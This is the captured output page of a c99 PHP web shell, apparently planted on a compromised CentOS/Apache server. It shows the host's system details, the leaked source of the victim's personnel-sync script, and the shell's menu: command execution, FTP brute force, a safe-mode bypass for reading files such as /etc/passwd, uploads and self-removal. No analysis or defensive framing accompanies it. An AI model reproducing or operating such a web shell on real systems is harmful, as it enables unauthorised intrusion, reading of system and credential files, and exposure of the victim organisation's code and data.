!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk_joice2222/eoffice/admin/   drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processUpdatePerson.php (2.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
include_once 
"../link/function.php";
include_once 
"../class/clsTable.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../class/clsDepartmentPE.php";
include_once 
"../class/clsPersonPE.php";
$oCc = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']);
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);


$oDP = new Department($oC);
$oPS = new person($oC);

$oDPp = new departmentPE($oCc);
$oDPp2 = new departmentPE($oCc);
$oPSp = new PersonPE($oCc);    
    
    
echo 
"<br><br><div align=center><strong>--- ระบบกำลังปรับปรุงข้อมูลบุคลากร กรุณารอสักครู่ ---</strong></div>";
$oPSp->RSAllperson();
 while(
$oPSp->GetRecord()){
    
$oPS->SearchByKey($oPSp->personId);
        if(
$oPS->GetRecord()=="1"){ //เจอ 
            //echo "workGpId==".$oPS->workGpId;
                    
$oPS->Edit();
                    
$oPS->personId=$oPSp->personId;
                    
$oPS->deptId=$oPSp->deptId;
                    
$oPS->workGpId=$oPS->workGpId;
                    if(
$oPSp->prefixId=="2" ||  $oPSp->prefixId=="3"){
                        
$oPS->prefixId=$oPSp->prefixId;
                    }else{
                        
$oPS->prefixId="1";
                    }
                    
$oPS->fName=$oPSp->fName;
                    
$oPS->lName=$oPSp->lName;
                    
$oPS->fStatus=$oPSp->fStatus;
                    
$oPS->adminId=$oPSp->adminId;
                    
$oPS->fRetire=$oPSp->fRetire;
                    
$oPS->hireId=$oPSp->hireId;
                    
//echo "เจอ=update=".$oPS->fName."".$oPS->lName."fstatus=".$oPS->fStatus."hireId=".$oPS->hireId."<br>";
                    
$oPS->Save();
        }else{ 
//ไม่เจอ
                    
if($oPSp->fStatus=="1" && $oPSp->fRetire=="0"){
                        
$oPS->AddNew();
                        
$oPS->personId=$oPSp->personId;
                        
$oPS->deptId=$oPSp->deptId;
                        
$oPS->workGpId="";  
                        if(
$oPSp->prefixId=="2" ||  $oPSp->prefixId=="3"){
                            
$oPS->prefixId=$oPSp->prefixId;
                        }else{
                            
$oPS->prefixId="1";
                        }
                        
$oPS->fName=$oPSp->fName;
                        
$oPS->lName=$oPSp->lName;
                        
$oPS->fStatus=$oPSp->fStatus;
                        
$oPS->adminId=$oPSp->adminId;
                        
$oPS->fRetire=$oPSp->fRetire;
                        
$oPS->hireId=$oPSp->hireId;
                    
//    echo "ไม่เจอ=เพิ่มใหม่=".$oPS->fName."".$oPS->lName."fstatus=".$oPS->fStatus."hireId=".$oPS->hireId."<br>";
                        
$oPS->Save();
                    }
        } 
//
 
//loop all ps
         
                                                 
echo "<meta http-equiv='refresh' content='0; URL=updatePerson.php?s=1'>";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0066 ]--